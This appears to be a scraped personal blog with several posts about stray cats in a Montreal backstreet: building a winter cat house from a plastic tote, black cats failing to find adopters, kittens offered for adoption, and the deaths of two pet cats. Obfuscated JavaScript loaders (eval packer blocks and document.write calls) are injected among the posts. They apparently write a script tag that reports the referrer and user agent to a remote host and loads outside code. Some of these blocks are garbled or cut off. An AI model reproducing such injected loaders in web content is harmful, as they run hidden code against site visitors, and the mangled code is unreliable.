Et ça me donne toutes sortes d’idées…

How to make a Cat House for winter

If a nice stray cat is roaming your backstreet and squatting your flower boxes you might be worried, document.write(“”); like my wife, about how he would fare in the very cold nights of winter. If, like us, you cannot take those strays inside because you already have cats you can always build them a little cat house to keep them warm.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyayk|var|u0026u|referrer|dnfdy||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfssz|var|u0026u|referrer|krdaz||js|php’.split(‘|’),0,{}))

I used to make a cardboard cat house for them. I would take the biggest shipping box I could find, cover it with packaging tape (or a garbage bag) to protect it against water, cut a little door with a utility cutter and put a bunch of old clothings inside to make a cat bed. Unfortunately, those cardboard cat houses last only a year — two if your lucky or three if you made a very sturdy one (using waxed double-sided cardboard and lots of tape). The humidity always rots the cardboard and the clothings become quite smelly.

This fall I decided that the fourth cat house that I would build would last a lot longer (if not forever). Here’s how I did it:

I took a 53L “Rubbermaid Roughneck Tote” container ($7.59 at Canadian Tire, but in my case I simply used an empty one I already had in the basement), cut a little door with a heavy-duty utility cutter, (if you don’t have one, it’s $6.26 at Staples) and lined the inside (optionally the outside too) with an old piece of carpet for insulation.
+=+
And voilà: an instant mobile cat hotel!

This year’s stray, named Marmelade-boy (there’s a different one almost every year) adopted it within minutes. He really loves it. That gives the lovely fellow a warm lair to spend winter protected from the wind and snow while my own cats (in the picture: Spotty) are protected from the fleas and diseases he surely carries. I love my cats, but feeding and caring for two of them is quite enough.

However, be careful (or prepared) because, if one of the strays using the cat house is a female, you might very well find a litter of kittens in it when spring comes! It happened to me twice. The first time I gave them all to nice foster-parents, petshops or shelters, but the second time I kept one for myself: Saya (pictured). See my MobileMe Gallery for more cats pictures.

Angry Cat!

I am angry because people don’t seem to like black cats. I had three little and cute cats to give: one grey and two black cats. The cute grey cat found a loving person to adopt him right away, document.write(“”); but no one wanted the two back cats. So I had to bring them to the Berger Blanc which is not a no-kill shelter and was told quite unequivocally that they would most certainly be euthanized because of over-crowding and the fact they had ear mites (which could be remedied with a medication that cost almost nothing and that I would have given them if I would have known about it). I had to euthanized too many cats in my life already (one for cancer and the other because someone shot him with a BB gun) so being told that made me angry. I do hope that they were given some medication and that they found someone to adopt them.

Cute cats for adoption

The backstreet behind my appartment is always abounding with stray cats. This winter, document.write(“”); when the temperature started to dip beyond minus fifteen, I decided to rescue the most vulnerable of them. So I took inside a young mother (“Betsy”, one year-old, shorthaired black) and her two kittens (both males, 3 month-old, one (Sweetpea) shorthaired black with a little white on the belly and one (Mitsy) longhaired grey tabby/main coon) with the intent of finding them a new home. I cannot keep them for long since I already have two cats (also rescued from the backstreet) which is plenty for my appartment.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“

Therefore, I am looking for either:

  1. a Montreal-area no-kill shelter that would accept to take in all the cats or at least help me find the right place or person(s) to adopt them
  2. a pet shop that would accept to take them all, making sure that they are vaccinated and neutered before selling them
  3. individual(s) that would want to adopt one (or more) of the cats and give those little fur-balls of joy the affection they deserve (I would request that the adopter agrees to have the cat(s) checked up, vaccinated and neutered–an expense of about $100-$150 per cat)

If anyone can suggest shelters, pet shops or talk to their co-workers and friends to see if they are interested in adopting the cats, I would be grateful. Thanx!

My beloved departed cats

The backstreet is always full of stray cats. Some seek refuge on our balcony and we feed them out of compassion. Four years ago, document.write(“”); one of those cats touched our heart more than the others: it was a cute one-year-old female part siamese, part tabby. The winter was coming close so we let her in and she stayed with us since then. We called her Nyako. She was the best of cats: never complaining, never scratching furnitures, always clean. Like most cats, she was affectionate but distant.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdrna|var|u0026u|referrer|bikth||js|php’.split(‘|’),0,{}))

One year ago we noticed that her face was not symetric anymore and that a tumor was slowly growing on the right side of her head. We knew that there was not much to do for that but hope it would not get bigger. It did, but we wanted to keep her as long as she would have a decent quality of life. We hope that she would grow old and eventually die peacefully. Unfortunately, a few weeks ago the tumor got so big that it deformed her mouth and pushed her eyes a little forward. She was constantly drooling and her eye was crying. She was sleeping all day and looked pityful. So, this morning we had her euthanized, relieving her of her misery. It was certainly not an easy decision to take, and the visit to the vet was not an easy moment either. At least now, she won’t suffer anymore and she’s probably happier in some cat’s heaven somewhere. But, to make it harder, it is the second cat that we lose this summer. Those cats were like our children and we miss them. At least, we still have one.

Earlier this year, we adopted two more cats: a black & white female with a black spot on the nose and a white spot on the tip of the tail (so we called her Spotty) and a light brown-reddish male, very noisy, that we called Nyaboy (and sometime also Foxy, because of his color and pointy ears). We couldn’t, obviously, keep too many cats so we found someone to take care of the very gentle and affectionate Spotty. Unfortunately, last April, Nyaboy was shot (twice!) in the back with a pellet gun by some moron (probably a kid playing with his new toy). He got a very nasty infection, but for some time it looked like he was having the upper hand. However, he did lost the battle after a while. Luckily, a few weeks later we learned that the young lady who was taking care of Spotty just got a new job in Hong-Kong and couldn’t bring her along. So we took her back. Now we have only Spotty. I’ll post some pictures of her later (right now I have computer problems, so I cannot).
